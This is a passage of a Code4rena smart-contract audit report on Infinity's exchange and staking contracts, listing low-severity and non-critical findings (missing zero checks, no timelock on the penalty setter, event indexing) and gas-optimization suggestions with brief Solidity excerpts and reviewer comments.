Proof of Concept

Instances include:


((threeMonthLock - threeMonthVested) / THREEMONTHPENALTY)
((sixMonthLock - sixMonthVested) / SIXMONTHPENALTY)
((twelveMonthLock - twelveMonthVested) / TWELVEMONTHPENALTY)

All these storage variables in the denominators are set by the owner in updatePenalties(), and can be 0 as there is no non-zero check.


Before doing these computations, add a non-zero check to these variables. Or alternatively, add a non-zero check in updatePenalties().

[L-03] Immutable addresses lack zero-address check

Constructors should check the address written in an immutable address variable is not the zero address

Proof of Concept

Instances include:




Add a zero address check for _WETH.

[L-04] Payable functions when using ERC20

There should be a require(0 == msg.value) to ensure no Ether is being sent to the exchange when the currency used in an order is a ERC20 token.

Proof of Concept

Instances include:


scope: takeMultipleOneOrders

scope: takeOrders


Add require(0 == msg.value) in both condition blocks mentioned above.

[L-05] Receive function

InfinityStaker.sol is not supposed to receive ETH. Instead of using a rescue function, remove receive() and fallback() altogether.

Proof of Concept

Instances include:


fallback() external payable
receive() external payable
function rescueETH(address destination) external payable


Remove these functions, or include a call to rescueETH in receive(), so that a user that mistakenly sends ETH to the Staker retrieves it immediately.

[L-06] Setters should check the input value

Setters should check the input value - ie make revert if it is the zero address or zero

Proof of Concept

Instances include:


function updateMatchExecutor


function updateStakeLevelThreshold There should be a check that the new threshold does not break the following: BRONZE < SILVER < GOLD < PLATINUM
function updatePenalties
function updateInfinityTreasury


Add non-zero checks - address or uint - to the setters aforementioned.

[L-07] Timelock or maximum amount on updatePenalties

updatePenalties() changes how much a user loses upon “ragequiting” - ie withdrawing their tokens from the staker without waiting for the vesting period. It currently does not have any timelock, or any maximum amount: the owner can set the penalties such that a user calling rageQuit() loses all their Infinity tokens (all would be transferred to INFINITY_TREASURY). Adding a timelock would provide more guarantees to users and reduces the level of trust required.

Proof of Concept

Instances include:




Either add a timelock to updatePenalties(), or add a maximum penalty check.

[N-01] Comment Missing function parameter

Some of the function comments are missing function parameters or returns

Proof Of Concept

Instances include:


bool verifySellOrder
uint256 execPrice
address seller,address buyer,OrderTypes.OrderItem[] calldata constructedNfts,address currency,uint256 amount
address seller,address buyer,uint256 sellNonce,uint256 buyNonce,OrderTypes.OrderItem[] calldata constructedNfts,address currency,uint256 amount
OrderTypes.MakerOrder calldata order
OrderTypes.MakerOrder calldata order
address destination,address currency,uint256 amount
address destination


OrderTypes.MakerOrder calldata sell, OrderTypes.MakerOrder calldata buy
OrderTypes.MakerOrder calldata sell, OrderTypes.MakerOrder calldata buy
OrderTypes.MakerOrder calldata sell,OrderTypes.MakerOrder calldata buy,OrderTypes.OrderItem[] calldata constructedNfts
OrderTypes.MakerOrder calldata makerOrder, OrderTypes.OrderItem[] calldata takerItems
OrderTypes.MakerOrder[] calldata orders
OrderTypes.MakerOrder calldata order


address user,uint256 amount,uint256 noVesting,uint256 vestedThreeMonths,uint256 vestedSixMonths,uint256 vestedTwelveMonths
address user
address destination
StakeLevel stakeLevel, uint16 threshold
uint16 threeMonthPenalty,uint16 sixMonthPenalty,uint16 twelveMonthPenalty
address _infinityTreasury


Add a comment for these parameters

[N-02] Commented code

There are portions of commented code in some files.

Proof of Concept

Instances include:


line 1169


Remove commented code

[N-03] Constants instead of magic numbers

It is best practice to use constant variables rather than literal values to make the code easier to understand and maintain.

Proof of Concept

Instances include:








Define constant variables for the literal values aforementioned.

[N-04] Events indexing

Events should use indexed fields

Proof of Concept

Instances include:


event CancelAllOrders(address user, uint256 newMinNonce)
event CancelMultipleOrders(address user, uint256[] orderNonces)
event NewWethTransferGasUnits(uint32 wethTransferGasUnits))
event NewProtocolFee(uint16 protocolFee)
event MatchOrderFulfilled(bytes32 sellOrderHash,bytes32 buyOrderHash,address seller,address buyer,address complication, // address of the complication that defines the execution ,address currency, // token address of the transacting currency,uint256 amount // amount spent on the order)
event TakeOrderFulfilled(bytes32 orderHash,address seller,address buyer,address complication, // address of the complication that defines the executionaddress currency, // token address of the transacting currencyuint256 amount // amount spent on the order)


event Staked(address indexed user, uint256 amount, Duration duration)
event DurationChanged(address indexed user, uint256 amount, Duration oldDuration, Duration newDuration)
event UnStaked(address indexed user, uint256 amount)
event RageQuit(address indexed user, uint256 totalToUser, uint256 penalty)


event EpochAdvanced(uint256 currentEpoch, uint256 supplyMinted)


Add indexed fields to these events so that they have the maximum number of indexed fields possible.

[N-05] Function missing comments

Some functions are missing comments.

Proof of Concept

Instances include:


function _emitMatchEvent
function _emitTakerEvent
function _nftsHash
function _tokensHash


function _getDurationInSeconds


function advanceEpoch()
function _beforeTokenTransfer()
function _afterTokenTransfer()
function _mint()
function _burn()
function getAdmin()
function getTimelock()
function getInflation()
function getCliff()
function getMaxEpochs()
function getEpochDuration()


Add comments to these functions

[N-06] Public functions can be external

It is good practice to mark functions as external instead of public if they are not called by the contract where they are defined.

Proof of Concept

Instances include:


function getUserTotalStaked()
function getUserTotalVested()


Declare these functions as external instead of public

When there are mappings that use the same key value, having separate fields is error prone, for instance in case of deletion or with future new fields.

Proof of Concept

Instances include:


mapping(address => uint256) public userMinOrderNonce;
mapping(address => mapping(uint256 => bool)) public isUserOrderNonceExecutedOrCancelled;


Group the related data in a struct and use one mapping:

struct OrderNonce {
  uint256 userMin;
  mapping(uint256 => bool) isExecutedOrCancelled;

And it would be used as a state variable:

mapping(address =>  OrderNonce) orderNonces;

[N-08] Scientific notation

For readability, it is best to use scientific notation (e.g 10e5) rather than decimal literals(100000) or exponentiation(10**5)

Proof of Concept

Instances include:


uint32 public WETHTRANSFERGAS_UNITS = 50000




uint16 public BRONZESTAKETHRESHOLD = 1000
uint16 public SILVERSTAKETHRESHOLD = 5000
uint16 public GOLDSTAKETHRESHOLD = 10000
uint16 public PLATINUMSTAKETHRESHOLD = 20000


Replace the numbers aforementioned with their scientific notation

nneverlander (Infinity) commented:


HardlyDifficult (judge) commented:

I love how you name the inlined links — really improves the readability.

Gas Optimizations

For this contest, 56 reports were submitted by wardens detailing gas optimizations. The report highlighted below by IllIllI received the top score from the judge.

The following wardens also submitted reports: joestakey, antonttc, robee, peritoflores, PwnedNoMore, 0x1f8b, 0xKitsune, defsec, StErMi, MiloTruck, MadWookie, BowTiedWardens, FSchmoede, reassor, simon135, 0xkatana, Tomio, hansfriese, Tadashi, 0x29A, _Adam, 0xf15ers, Picodes, TerrierLover, codexploder, Kenshin, 0xkowloon, Chom, c3phas, ElKu, Kaiziron, Waze, GimelSec, hake, slywaters, Funen, zer0dot, kenta, Wayne, 0xNazgul, TomJ, delfin454000, hyh, fatherOfBlocks, apostle0x01, 0xDjango, Lambda, 0xAsm0d3us, oyc_109, PPrieditis, 0v3rf10w, asutorufos, rfa, sach1r0, and k.


Issue Instances
G‑01 Multiple address mappings can be combined into a single mapping of an address to a struct, where appropriate 1
G-02 State variables only set in the constructor should be declared immutable 2
G-03 State variables can be packed into fewer storage slots 1
G-04 State variables should be cached in stack variables rather than re-reading them from storage 9
G-05 Multiple accesses of a mapping/array should use a local variable cache 13
G-06 internal functions only called once can be inlined to save gas 22
G-07 Add unchecked {} for subtractions where the operands cannot underflow because of a previous require() or if-statement 3
G-08 require()/revert() strings longer than 32 bytes cost extra gas 3
G-09 Using bools for storage incurs overhead 1
G-10 Using > 0 costs more gas than != 0 when used on a uint in a require() statement 1
G-11 >= costs less gas than > 1
G-12 It costs more gas to initialize non-constant/non-immutable variables to zero than to let the default of zero be applied 26
G-13 Splitting require() statements that use && saves gas 2
G-14 Usage of uints/ints smaller than 32 bytes (256 bits) incurs overhead 39
G-15 Using private rather than public for constants, saves gas 5
G-16 Duplicated require()/revert() checks should be refactored to a modifier or function 6
G-17 Empty blocks should be removed or emit something 4
G-18 Use custom errors rather than revert()/require() strings to save gas 47
G‑19 Functions guaranteed to revert when called by normal users can be marked payable 13

Total: 199 instances over 19 issues

[G-01] Multiple address mappings can be combined into a single mapping of an address to a struct, where appropriate

Saves a storage slot for the mapping. Depending on the circumstances and sizes of types, can avoid a Gsset (20000 gas) per mapping combined. Reads and subsequent writes can also be cheaper when a function requires both values and they both fit in the same storage slot. Finally, if both fields are accessed in the same function, can save ~42 gas per access due to not having to recalculate the key’s keccak256 hash (Gkeccak256 - 30 gas) and that calculation’s associated stack operations.

There is 1 instance of this issue:

File: contracts/core/InfinityExchange.sol   #1

70      mapping(address => uint256) public userMinOrderNonce;
72      /// @dev This records already executed or cancelled orders to prevent replay attacks.
73:     mapping(address => mapping(uint256 => bool)) public isUserOrderNonceExecutedOrCancelled;

[G-02] State variables only set in the constructor should be declared immutable

Avoids a Gsset (20000 gas) in the constructor, and replaces each Gwarmacces (100 gas) with a PUSH32 (3 gas).

There are 2 instances of this issue. (For in-depth details on this and all further gas optimizations with multiple instances, see the warden’s full report.)

[G-03] State variables can be packed into fewer storage slots

If variables occupying the same slot are both written the same function or by the constructor, avoids a separate Gsset (20000 gas). Reads of the variables can also be cheaper

There is 1 instance of this issue:

File: contracts/staking/InfinityStaker.sol   #1

/// @audit Variable ordering with 3 slots instead of the current 4:
/// @audit  mapping(32):userstakedAmounts, address(20):INFINITY_TOKEN, uint16(2):BRONZE_STAKE_THRESHOLD, uint16(2):SILVER_STAKE_THRESHOLD, uint16(2):GOLD_STAKE_THRESHOLD, uint16(2):PLATINUM_STAKE_THRESHOLD, uint16(2):THREE_MONTH_PENALTY, uint16(2):SIX_MONTH_PENALTY, address(20):INFINITY_TREASURY, uint16(2):TWELVE_MONTH_PENALTY
23:     mapping(address => mapping(Duration => StakeAmount)) public userstakedAmounts;

[G-04] State variables should be cached in stack variables rather than re-reading them from storage

The instances below point to the second+ access of a state variable within a function. Caching of a state variable replace each Gwarmaccess (100 gas) with a much cheaper stack read. Other less obvious fixes/optimizations include having local memory caches of state variable structs, or having local caches of state variable contracts/addresses.

There are 9 instances of this issue.

[G-05] Multiple accesses of a mapping/array should use a local variable cache

The instances below point to the second+ access of a value inside a mapping/array, within a function. Caching a mapping’s value in a local storage or calldata variable when the value is accessed multiple times, saves ~42 gas per access due to not having to recalculate the key’s keccak256 hash (Gkeccak256 - 30 gas) and that calculation’s associated stack operations. Caching an array’s struct avoids recalculating the array offsets into memory/calldata

There are 13 instances of this issue.

[G-06] internal functions only called once can be inlined to save gas

Not inlining costs 20 to 40 gas because of two extra JUMP instructions and additional stack operations needed for function calls.

There are 22 instances of this issue.

[G-07] Add unchecked {} for subtractions where the operands cannot underflow because of a previous require() or if-statement

require(a <= b); x = b - a => require(a <= b); unchecked { x = b - a }

There are 3 instances of this issue.

[G-08] require()/revert() strings longer than 32 bytes cost extra gas

Each extra memory word of bytes past the original 32 incurs an MSTORE which costs 3 gas

There are 3 instances of this issue.

[G-09] Using bools for storage incurs overhead

    // Booleans are more expensive than uint256 or any type that takes up a full
    // word because each write operation emits an extra SLOAD to first read the
    // slot's contents, replace the bits taken up by the boolean, and then write
    // back. This is the compiler's defense against contract upgrades and
    // pointer aliasing, and it cannot be disabled.
Use uint256(1) and uint256(2) for true/false to avoid a Gwarmaccess (100 gas) for the extra SLOAD, and to avoid Gsset (20000 gas) when changing from ‘false’ to ‘true’, after having been ‘true’ in the past

There is 1 instance of this issue:

File: contracts/core/InfinityExchange.sol   #1

73:     mapping(address => mapping(uint256 => bool)) public isUserOrderNonceExecutedOrCancelled;

[G-10] Using > 0 costs more gas than != 0 when used on a uint in a require() statement

This change saves 6 gas per instance. The optimization works until solidity version 0.8.13 where there is a regression in gas costs.

There is 1 instance of this issue:

File: contracts/core/InfinityExchange.sol   #1

392:      require(numNonces > 0, 'cannot be empty');

[G-11] >= costs less gas than >

The compiler uses opcodes GT and ISZERO for solidity code that uses >, but only requires LT for >=, which saves 3 gas

There is 1 instance of this issue:

File: contracts/token/InfinityToken.sol   #1

67        epochsPassedSinceLastAdvance = epochsPassedSinceLastAdvance > epochsLeft
68          ? epochsLeft
69:         : epochsPassedSinceLastAdvance;

[G-12] It costs more gas to initialize non-constant/non-immutable variables to zero than to let the default of zero be applied

Not overwriting the default for stack variables saves 8 gas. Storage and memory variables have larger savings

There are 26 instances of this issue.

[G-13] Splitting require() statements that use && saves gas

See this issue which describes the fact that there is a larger deployment gas cost, but with enough runtime calls, the change ends up being cheaper

There are 2 instances of this issue.

[G-14] Usage of uints/ints smaller than 32 bytes (256 bits) incurs overhead

When using elements that are smaller than 32 bytes, your contract’s gas usage may be higher. This is because the EVM operates on 32 bytes at a time. Therefore, if the element is smaller than that, the EVM must use more operations in order to reduce the size of the element from 32 bytes to the desired size. Use a larger size then downcast where needed

There are 39 instances of this issue.

[G-15] Using private rather than public for constants, saves gas

If needed, the value can be read from the verified contract source code. Saves 3406-3606 gas in deployment gas due to the compiler not having to create non-payable getter functions for deployment calldata, not having to store the bytes of the value outside of where it’s used, and not adding another entry to the method ID table

There are 5 instances of this issue.

[G-16] Duplicated require()/revert() checks should be refactored to a modifier or function

Saves deployment costs

There are 6 instances of this issue.

[G-17] Empty blocks should be removed or emit something

The code should be refactored such that they no longer exist, or the block should do something useful, such as emitting an event or reverting. If the contract is meant to be extended, the contract should be abstract and the function signatures be added without any default implementation. If the block is an empty if-statement block to avoid doing subsequent checks in the else-if/else conditions, the else-if/else conditions should be nested under the negation of the if-statement, because they involve different classes of checks, which may lead to the introduction of errors when the code is later modified (if(x){}else if(y){...}else{...} => if(!x){if(y){...}else{...}})

There are 4 instances of this issue.

[G-18] Use custom errors rather than revert()/require() strings to save gas

Custom errors are available from solidity version 0.8.4. Custom errors save ~50 gas each time they’re hitby avoiding having to allocate and store the revert string. Not defining the strings also save deployment gas

There are 47 instances of this issue.

[G-19] Functions guaranteed to revert when called by normal users can be marked payable

If a function modifier such as onlyOwner is used, the function will revert if a normal user tries to pay the function. Marking the function as payable will lower the gas cost for legitimate callers because the compiler will not include checks for whether a payment was provided. The extra opcodes avoided are CALLVALUE(2),DUP1(3),ISZERO(3),PUSH2(3),JUMPI(10),PUSH1(3),DUP1(3),REVERT(0),JUMPDEST(1),POP(2), which costs an average of about 21 gas per call to the function, in addition to the extra deployment cost

There are 13 instances of this issue.

nneverlander (Infinity) commented:

Thank you for the detailed report.

HardlyDifficult (judge) commented:



C4 is an open organization governed by participants in the community.

C4 Contests incentivize the discovery of exploits, vulnerabilities, and bugs in smart contracts. Security researchers are rewarded at an increasing rate for finding higher-risk issues. Contest submissions are judged by a knowledgeable security researcher and solidity developer and disclosed to sponsoring developers. C4 does not conduct formal verification regarding the provided code but instead provides final verification.

C4 does not provide any guarantee or warranty regarding the security of this project. All smart contract software should be used at the sole risk and responsibility of users.